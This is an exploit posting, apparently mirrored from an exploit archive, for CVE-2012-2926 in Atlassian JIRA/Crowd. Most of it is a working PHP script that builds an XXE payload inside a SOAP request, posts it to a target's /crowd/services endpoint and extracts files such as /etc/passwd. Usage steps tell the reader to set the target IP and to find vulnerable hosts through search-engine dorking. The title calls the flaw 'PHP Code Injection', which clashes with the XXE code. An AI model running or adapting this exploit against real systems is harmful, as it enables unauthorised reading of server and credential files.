Exploit for Atlassian JIRA Arbitrary File Read CVE-2012-2926

## https://sploitus.com/exploit?id=PACKETSTORM:189530
=============================================================================================================================================
    | # Title     : Atlassian JIRA before 5.0.1 PHP Code Injection Vulnerability                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://developer.atlassian.com/                                                                                            |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: An XML SOAP code is generated containing the XXE exploit to read the requested file.
    	
    	( https://packetstorm.news/files/id/181107/ CVE-2012-2926 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 46
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    function exploit_xxe($target, $port, $file, $os) {
        $url = "http://$target:$port/crowd/services";
        
        $entity = 'xxetest';
        $payload = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n";
        $payload .= "<!DOCTYPE foo [<!ENTITY $entity SYSTEM \"file://$file\"> ]>\n";
        $payload .= "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n";
        $payload .= "<soapenv:Body>\n";
        $payload .= "<urn:addAllPrincipals xmlns:urn=\"urn:SecurityServer\">\n";
        $payload .= "<urn:in0>\n";
        $payload .= "<aut:name>?</aut:name>\n";
        $payload .= "<aut:token>?</aut:token>\n";
        $payload .= "</urn:in0>\n";
        $payload .= "<urn:in1>\n";
        $payload .= "<soap:SOAPPrincipalWithCredential>\n";
        $payload .= "<soap:passwordCredential>\n";
        $payload .= "<aut:encryptedCredential>?&$entity;</aut:encryptedCredential>\n";
        $payload .= "</soap:passwordCredential>\n";
        $payload .= "</soap:SOAPPrincipalWithCredential>\n";
        $payload .= "</urn:in1>\n";
        $payload .= "</urn:addAllPrincipals>\n";
        $payload .= "</soapenv:Body>\n";
        $payload .= "</soapenv:Envelope>";
        
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            "Content-Type: text/xml; charset=UTF-8",
            "SOAPAction: \"\""
        ]);
        
        $response = curl_exec($ch);
        curl_close($ch);
        
        if (preg_match('/Invalid boolean value: \?(.*)/m', $response, $matches)) {
            echo "[+] Retrieved file content from $os:\n" . $matches[1] . "\n";
        } else {
            echo "[-] Failed to retrieve file from $os.";
        }
    }
    
    $target = "192.168.1.100"; // ضع عنوان IP للخادم المستهدف
    $port = 8095;
    $file_linux = "/etc/passwd";
    $file_windows = "C:\\Windows\\System32\\drivers\\etc\\hosts";
    
    exploit_xxe($target, $port, $file_linux, "Linux");
    exploit_xxe($target, $port, $file_windows, "Windows");
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================